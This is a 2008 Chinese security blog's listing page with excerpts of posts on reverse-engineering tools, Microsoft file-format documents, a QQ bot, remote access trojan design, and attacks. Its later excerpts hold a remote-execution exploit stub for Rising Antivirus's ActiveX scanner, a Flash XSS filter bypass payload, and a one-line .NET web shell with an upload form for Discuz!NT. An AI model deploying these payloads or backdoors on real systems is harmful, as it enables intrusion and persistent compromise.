PaiMei

2008/02/27 4:48 | 鬼仔 | 工具收集 | 消灭0留言

Pedram Amini同学写的工具,Paimei去年还是前年刚出来的时候,dm牛牛就发到了论坛,非常好用的一个工具,很多漏洞重现起来很麻烦,用这个基本上十几分钟就能出来。
最近又有人写了一个教学,不会的同学可以去看看

PaiMei is a reverse engineering framework consisting of multipleextensible components. The goal of the framework is to reduce the timefrom "idea" to prototype to a matter of minutes, instead of days.PaiMei 阅读全文 »

Tags: ,

微软公开了几乎所有的文件格式和通信协议文档

2008/02/27 4:44 | 鬼仔 | 工具收集 | 消灭0留言

来源:tombkeeper的和谐Blog

Windows_Server_Protocols.zip
Windows_Communication_Protocols.zip

Tags: , ,

Microsoft Office Binary (doc, xls, ppt) File Formats

2008/02/27 4:39 | 鬼仔 | 工具收集 | 消灭0留言

Microsoft Word
Word 97-2007 Binary File Format (.doc) Specification PDF | XPS
阅读全文 »

Tags: , , ,

C#版QQ机器人组件源码(带示例程序)

2008/02/26 8:34 | 鬼仔 | 技术文章 | 6 条评论了已经

作者:overred
来源:开往春天的地铁

(千万别用此程序乱发广告,更不要跟博客园闪存机器人对闪而刷闪存,后果自负,谢谢)
声明:
本程序以学习为目的,不涉及任何商业利益。任何企业和个人与此程序有关的商业行为,请与腾讯公司联系。
本程序的协议分析过程为黑盒方式,必然会存在不准确的地方,故仅供读者参考。
同时,本程序借鉴了很多互联网中流传的技术资料,在这里就不一一列举!

看到园子里很多朋友对QQ机器人很感兴趣,尤其是c#版本的。
目前C#版本的QQ机器人组件在各大搜索引擎中比较难寻,基于http协议的已经不能再继续使用。

于是就把手里的一份可以登录、收发消息、显示好友等功能的C#版本的基于Udp( 阅读全文 »

Tags: , , ,

Rising Antivirus Online Scanner Insecure Method Flaw Exploit

2008/02/26 6:13 | 鬼仔 | 工具收集 | 才 1 条评论

<!–
– Rising is a popular anti-virus product around China.
– there's an insecure method flaw inside its free online scanner.
– it's quite easy to exploit the bug which leads to a remote execution.
– visit http://online.rising.com.cn/free/index.htm to install the ActiveX first.
– the demonstration below will download http://jsmith080220.googlepages.com/olupdate.zip and
阅读全文 »

Tags: ,

RAT结构演变史

2008/02/26 5:47 | 鬼仔 | 技术文章 | 消灭0留言

转载保留版权
[email protected]
http://www.famdiy.com/
想了解更深层的RAT架构的不妨进来看看.高手飘过…
稍微详细的讲述一下Bifrost,Flux,PoisonIvy的结构

只说RAT结构演变…其他技术不讨论…
自从Bo出世后.大量的RAT相继出现…
国内熟悉的,冰河,黑洞,PcShare,灰鸽子等…
国外熟悉的.Bifrost,Flux,Assasin,Beast,Bandook,Institution,PoisonIvy等…
相继有自己的特色…包括程序结构…出现了许多令人惊叹的东西…

[1]结构简介:

第一代:-EXE独立结构
相对应的…C/S架构…
EXE—->EXE
都是EXE的…比如说冰河,黑洞…几乎第一,二代RAT都是
阅读全文 »

Tags: ,

Flash XSS

2008/02/26 3:44 | 鬼仔 | 技术文章 | 消灭0留言

来源:loveshell

不得不记录一些…
在进行FLASH XSS攻击的时候,简单的处理多是使用AllowScriptAccess属性,将其设置为sameDomain(同域下swf执行AS),更彻底的就 never.但是检查的时候很多是判断参数是不是always,如果是,就把always换成sameDomain或者never,但是如果是空呢?
<EMBED SRC="http://很好,很疯狗.com/xss.swf" ALLOWSCRIPTACCESS=""></EMBED>

那么以上的处理就失效了,恰巧,当ALLOWSCRIPTACCESS参数为空时,将会使用默认值"always",日.
如果不允许设置""呢,那就随便拿个被替换为空的字符串.
<EMBED SRC="http://很好,很疯狗.com/xss.swf" 阅读全文 »

Tags: ,

.net一句话马以及dx论坛拿shell

2008/02/26 3:40 | 鬼仔 | 工具收集 | 消灭0留言

来源:loveshell

dx论坛后台提供编辑模板功能,对于.net分层设计的思想这是个很好的功能,可是这个功能也导致了安全漏洞,可以插入自己的后门(也可以直接目录跳转编辑其他的aspx文件)
<% if(Request.Files.Count > 0) Request.Files[0].SaveAs(Server.MapPath(Request.Form["pass"]));%>

<form enctype="multipart/form-data" action="http://1.com/index.aspx" name="hack" method="POST" onsubmit=doit()>
插的在这里<input name="url" type=text value="htt 阅读全文 »